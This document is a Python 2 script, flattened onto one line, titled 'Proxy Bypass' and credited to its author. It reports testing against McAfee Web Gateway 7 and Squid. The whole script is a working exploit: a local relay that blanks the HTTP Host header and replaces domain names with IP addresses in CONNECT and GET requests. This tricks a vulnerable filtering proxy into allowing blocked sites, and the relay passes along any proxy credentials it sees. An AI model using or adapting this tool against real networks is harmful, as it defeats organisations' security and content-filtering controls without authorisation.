import socket,struct,sys,time from threading import Thread #The timeOut can be changed if the proxy is slow. #Tested in GMail, Facebook, Youtube and several blocked sites. #The proxy get the Host field of the http header and do not verify anything else. #It trusts on the HTTP Header and it can be modified by the attacker. timeOut = 0.8 isGet = 0 hostNameG = "" pacoteGet = "" port = 8080 #Listening port proxyAddr = "" #vulnerable proxy proxyPort = 8080 # proxy port def handle(client,globalSock): client.settimeout(timeOut) global hostNameG while 1: dados = "" tam = 0 while 1: try: dados2 = client.recv(1024) tam = tam + len(dados2) dados = dados + dados2 except socket.timeout: break dd = dados.find("CONNECT") #if the packet is a CONNECT METHOD if dd != -1: dd2 = dados.find(":") hostName = dados[dd+8:dd2] ipAddr = socket.gethostbyname(hostName) #changing the method to connect to the ip address, not the dns domain pacote = dados hostHeader = "Host: " + hostName pacote = pacote.replace(hostHeader, "Host:") #changing the host field with a value that is accepted by the proxy pacote = pacote.replace(hostName, ipAddr) #changind domain for ip dados = pacote getd = dados.find("GET ") getd2 = dados.find("//") getd3 = dados.find("/", getd2+2) hostName = dados[getd2+2:getd3] if getd != -1: globalSock.close() globalSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) globalSock.connect((proxyAddr,proxyPort)) globalSock.settimeout(timeOut) getd2 = dados.find("//") getd3 = dados.find("/", getd2+2) hostName = dados[getd2+2:getd3] proxyAuth = "" proxyAuthN = dados.find("Proxy-Authorization:") if proxyAuthN != -1: proxyAuthNN = dados.find("\r\n", proxyAuthN) proxyAuth = dados[proxyAuthN:proxyAuthNN] ipAddr = socket.gethostbyname(hostName) info = "CONNECT " + ipAddr + ":80 HTTP/1.1\r\n" if proxyAuthN != -1: info += proxyAuth + "\r\n" info += "Host:\r\n\r\n" globalSock.send(info) tam = 0 gdata = "" while 1: try: gdata2 = globalSock.recv(1024) tam = tam + len(gdata2) gdata = gdata + gdata2 if len(gdata2) == 0: break except socket.timeout: break globalSock.send(dados) tam = 0 gdata = "" while 1: try: gdata2 = globalSock.recv(1024) if len(gdata2) > 0: client.send(gdata2) tam = tam + len(gdata2) gdata = gdata + gdata2 if len(gdata2) == 0: break except socket.timeout: break print 'Proxy Bypass' print 'by Gabriel Menezes Nunes' print 'Tested on McAfee Web Gateway 7 and Squid Proxy' sockzao = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print 'Attacked Proxy:', print proxyAddr print 'Listening on', print port sockzao.bind(("",port)) sockzao.listen(6) while 1: print 'Waiting for connections' client, address = sockzao.accept() print 'Client Connected' print address globalSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) globalSock.connect((proxyAddr,proxyPort)) globalSock.settimeout(timeOut) t = Thread(target=handle, args=(client,globalSock,)) t.start()